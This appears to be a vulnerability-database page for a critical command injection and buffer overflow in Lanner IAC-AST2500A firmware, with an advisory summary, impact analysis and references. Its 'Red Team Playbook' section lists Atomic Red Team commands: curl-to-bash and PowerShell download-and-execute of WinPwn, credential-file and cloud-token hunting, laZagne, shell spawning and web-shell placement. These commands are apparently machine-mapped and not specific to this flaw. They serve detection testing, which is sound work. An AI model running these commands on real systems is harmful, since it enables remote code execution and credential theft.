CVE-2021-26728
Overview
The vulnerability consists of command injection and stack-based buffer overflow flaws originating from improper input validation in the KillDupUsr_func function within the spx_restservice component of Lanner Inc IAC-AST2500A firmware version 1.10.0. Specifically, unchecked user-supplied data is passed to system-level commands and buffer operations without adequate bounds checking, leading to memory corruption and arbitrary command execution vectors.
Vulnerability Description
Command injection and stack-based buffer overflow vulnerabilities in the KillDupUsr_func function of spx_restservice allow an attacker to execute arbitrary code with the same privileges as the server user (root). This issue affects: Lanner Inc IAC-AST2500A standard firmware version 1.10.0.
Impact
An unauthenticated remote attacker can exploit these vulnerabilities to execute arbitrary code with root privileges on the device, enabling full system compromise. This includes installing persistent malware, exfiltrating sensitive data, or disrupting device operations. The attack requires only network access to the device's REST service, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). The elevated privileges and unauthenticated access significantly increase the potential for lateral movement within affected networks and operational technology environments.
Solution
Lanner Inc has addressed these vulnerabilities in firmware updates subsequent to version 1.10.0. Users should upgrade to the latest firmware version as recommended in the Nozomi Networks advisory (https://www.nozominetworks.com/labs/vulnerability-advisories/cve-2021-26728/). The advisory provides detailed patch instructions and mitigation guidance. Applying the vendor-supplied firmware update replaces the vulnerable spx_restservice component, eliminating the command injection and buffer overflow flaws.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the KillDupUsr_func function of the spx_restservice involves both command injection and stack-based buffer overflow. This dual nature of the vulnerability allows an attacker to execute arbitrary code with the same privileges as the server user, which in this case is root. The command injection aspect enables the execution of malicious commands by manipulating input parameters, while the stack-based buffer overflow can lead to overwriting critical memory locations. This combination significantly increases the attack surface, as it allows for both unauthorized command execution and potential control over the system's execution flow, making it a severe threat to the integrity and security of the affected firmware.
Attack vectors for exploiting this vulnerability are varied and can be executed remotely, which amplifies the risk. An attacker could craft a specially designed request to the spx_restservice, targeting the vulnerable function. By injecting commands or payloads that exceed the expected input size, the attacker can trigger the buffer overflow, leading to arbitrary code execution. Scenarios may include deploying malware, establishing backdoors, or even launching further attacks within the network. Given that the affected firmware is used in specific hardware by Lanner Inc, attackers could exploit this vulnerability to gain control over devices deployed in sensitive environments, such as industrial control systems or critical infrastructure.
The real-world impact of this vulnerability is profound, particularly for organizations relying on the affected firmware. With a CVSS score of 9.8, it is classified as critical, indicating that exploitation could lead to significant data breaches, system downtime, and unauthorized access to sensitive information. The potential for an attacker to gain root access means that they could manipulate system configurations, exfiltrate data, or disrupt services. For businesses, this translates to not only financial losses due to operational disruptions but also reputational damage and potential legal ramifications stemming from data protection regulations.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Additionally, employing intrusion detection systems (IDS) can help identify unusual patterns of behavior indicative of exploitation attempts. Network segmentation can also limit the impact of a successful attack by isolating critical systems from less secure environments. Furthermore, conducting regular security audits and penetration testing can help organizations identify and remediate vulnerabilities before they can be exploited by malicious actors.
In conclusion, the command injection and stack-based buffer overflow vulnerabilities in the spx_restservice pose a significant threat to the security of systems running the affected firmware. The potential for remote exploitation, coupled with the severe consequences of unauthorized access, necessitates immediate attention from organizations using this technology. By adopting proactive detection and mitigation strategies, businesses can better safeguard their assets and maintain the integrity of their operations in an increasingly hostile cyber landscape.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Lannerinc | Iac-Ast2500a Firmware | 1.10.0 |
cpe:2.3:o:lannerinc:iac-ast2500a_firmware:1.10.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-26728 |
| nozominetworks.com |
GitHub CVE
|
https://www.nozominetworks.com/blog/vulnerabilities-in-bmc-firmware-affect-ot-iot-device-security-part-1/ |
| nozominetworks.com |
GitHub CVE
|
https://www.nozominetworks.com/labs/vulnerability-advisories/cve-2021-26728/ |